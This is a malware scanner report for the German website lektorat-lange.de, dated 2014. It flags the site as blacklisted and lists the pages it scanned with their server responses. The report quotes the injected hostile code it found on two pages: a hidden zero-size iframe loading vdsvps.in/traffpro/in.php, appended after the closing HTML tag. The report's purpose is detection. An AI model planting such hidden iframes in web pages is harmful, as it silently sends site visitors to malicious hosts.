New scan:

Malware Scanner report for lektorat-lange.de

Malicious/Suspicious/Total urls checked
2/0/12
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "lektorat-lange.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
2/0/2
2 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=lektorat-lange.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://lektorat-lange.de/
200 OK
Content-Length: 10559
Content-Type: text/html
malicious
Page code contains blacklisted domain: vdsvps.in

...[4833 bytes skipped]...
MG SRC="images/spacer.gif" WIDTH=3 HEIGHT=1 ALT=""></TD>
<TD>
<IMG SRC="images/spacer.gif" WIDTH=8 HEIGHT=1 ALT=""></TD>
<TD>
<IMG SRC="images/spacer.gif" WIDTH=41 HEIGHT=1 ALT=""></TD>
<TD></TD>
</TR>
</TABLE>
<!-- End ImageReady Slices -->
</BODY>
</center>
</HTML>
<iframe src="http://vdsvps.in/traffpro/in.php?s=brifr" width=0 height=0 frameborder=0>

Malicious iFrame found. The same iFrame was found in 11 websites.
size: 0x0     
src: http://vdsvps.in/traffpro/in.php?s=brifr
This URL is marked by Google as suspicious

<iframe src="http://vdsvps.in/traffpro/in.php?s=brifr" width=0 height=0 frameborder=0>

http://lektorat-lange.de/index.html
200 OK
Content-Length: 10559
Content-Type: text/html
malicious
Page code contains blacklisted domain: vdsvps.in

...[4833 bytes skipped]...
MG SRC="images/spacer.gif" WIDTH=3 HEIGHT=1 ALT=""></TD>
<TD>
<IMG SRC="images/spacer.gif" WIDTH=8 HEIGHT=1 ALT=""></TD>
<TD>
<IMG SRC="images/spacer.gif" WIDTH=41 HEIGHT=1 ALT=""></TD>
<TD></TD>
</TR>
</TABLE>
<!-- End ImageReady Slices -->
</BODY>
</center>
</HTML>
<iframe src="http://vdsvps.in/traffpro/in.php?s=brifr" width=0 height=0 frameborder=0>

Malicious iFrame found. The same iFrame was found in 11 websites.
size: 0x0     
src: http://vdsvps.in/traffpro/in.php?s=brifr
This URL is marked by Google as suspicious

<iframe src="http://vdsvps.in/traffpro/in.php?s=brifr" width=0 height=0 frameborder=0>

http://lektorat-lange.de/unser_unternehmen.html
200 OK
Content-Length: 8478
Content-Type: text/html
clean
http://lektorat-lange.de/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sat, 27 Dec 2014 02:34:46 GMT
Location: http://www.webplus24.de/fehlerseite.php
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
clean
http://www.webplus24.de/fehlerseite.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 02:34:46 GMT
Location: http://www.webplus24.de/404.htm
Server: Apache/2.2.16 (Debian) mod_fcgid/2.3.6 PHP/5.3.3-7+squeeze19 with Suhosin-Patch mod_python/3.3.1 Python/2.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 466
Content-Type: text/html; charset=iso-8859-1
clean
http://www.webplus24.de/404.htm
HTTP/1.1 302 Found
Connection: close
Date: Sat, 27 Dec 2014 02:34:47 GMT
Location: http://www.webplus24.de/fehlerseite.php
Server: Apache/2.2.16 (Debian) mod_fcgid/2.3.6 PHP/5.3.3-7+squeeze19 with Suhosin-Patch mod_python/3.3.1 Python/2.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 450
Content-Type: text/html; charset=iso-8859-1
clean
http://www.webplus24.de/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sat, 27 Dec 2014 02:34:47 GMT
Location: http://www.webplus24.de/fehlerseite.php
Server: Apache/2.2.16 (Debian) mod_fcgid/2.3.6 PHP/5.3.3-7+squeeze19 with Suhosin-Patch mod_python/3.3.1 Python/2.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 450
Content-Type: text/html; charset=iso-8859-1
clean
http://lektorat-lange.de/zielgruppen.html
200 OK
Content-Length: 8993
Content-Type: text/html
clean
http://lektorat-lange.de/leistungen.html
200 OK
Content-Length: 9011
Content-Type: text/html
clean
http://lektorat-lange.de/kontakt.php
200 OK
Content-Length: 10285
Content-Type: text/html
clean
http://lektorat-lange.de/AGB.html
200 OK
Content-Length: 7830
Content-Type: text/html
clean
http://lektorat-lange.de/impressum.html
200 OK
Content-Length: 7902
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: lektorat-lange.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 02:34:46 GMT
Accept-Ranges: bytes
ETag: "dc3b4e-293f-4ea1086b185c0"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 10559
Content-Type: text/html
Last-Modified: Thu, 31 Oct 2013 21:56:47 GMT

...10559 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lektorat-lange.de
Referer: http://www.google.com/search?q=lektorat-lange.de

Result:
The result is similar to the first query. There are no suspicious redirects found.